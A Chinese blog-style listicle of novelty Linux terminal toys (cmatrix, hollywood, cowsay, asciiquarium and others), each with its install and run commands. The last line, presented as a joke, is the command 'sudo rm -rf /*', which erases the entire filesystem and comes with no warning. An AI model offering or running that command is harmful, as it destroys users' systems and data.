Linux装逼神器

linux 装逼神器

黑客帝国字节数据流——假装自己是黑客高手,无孔不入

在命令行中输入以下命令安装并运行。

sudo apt-get install cmatrix
cmatrix

cmatrix字节流效果

还可输入参数控制颜色。

cmatric -C red

高大上仪表盘blessed-contrib——假装自己指点江山,纵横捭阖

sudo apt-get install npm
sudo apt install nodejs-legacy
git clone https://github.com/yaronn/blessed-contrib.git
cd blessed-contrib
npm install
node ./examples/dashboard.js

高大上仪表盘hollywood——假装自己日理万机,宵衣旰食

sudo apt install hollywood
hollywood

追逐鼠标的小猫oneko

sudo apt-get install oneko
oneko

ASCII艺术框:box命令

sudo apt-get install boxes
echo "Tongji Univerisity" | boxes
echo "Tongji Univerisity" | boxes -d dog
fortune | boxes -d cat | lolcat

燃起字符串大火aafire

sudo apt-get install libaa-bin  
aafire

火车:Strem Locomotive

sudo apt-get install sl

盯着鼠标看的大眼睛

sudo apt-get install x11-apps

艺术字生成器toilet/figlet

sudo apt-get install toilet
sudo apt-get install figlet

字符串视频——回归计算机的上古时代

sudo apt-get install bb

字符串水族馆:ASCIIquarium

sudo apt-get install libcurses-perl
cd /tmp

wget http://search.cpan.org/CPAN/authors/id/K/KB/KBAUCOM/Term-Animation-2.4.tar.gz

tar -zxvf Term-Animation-2.4.tar.gz
cd Term-Animation-2.4/

sudo perl Makefile.PL &&  make &&   make test

sudo make install
cd /tmp
sudo wget https://robobunny.com/projects/asciiquarium/asciiquarium.tar.gz
tar -zxvf asciiquarium.tar.gz
cd asciiquarium_1.1/
sudo cp asciiquarium /usr/local/bin
sudo chmod 0755 /usr/local/bin/asciiquarium
asciiquarium

会说话的牛

sudo apt-get install cowsay
sudo apt-get install xcowsay

日历

cal 12 2018

图片转字符串

sudo apt-get install aview imagemagick

wget http://labfile.oss.aliyuncs.com/courses/1/Linus.png

asciiview Linus.png

从删库到跑路 sudo rm -rf /*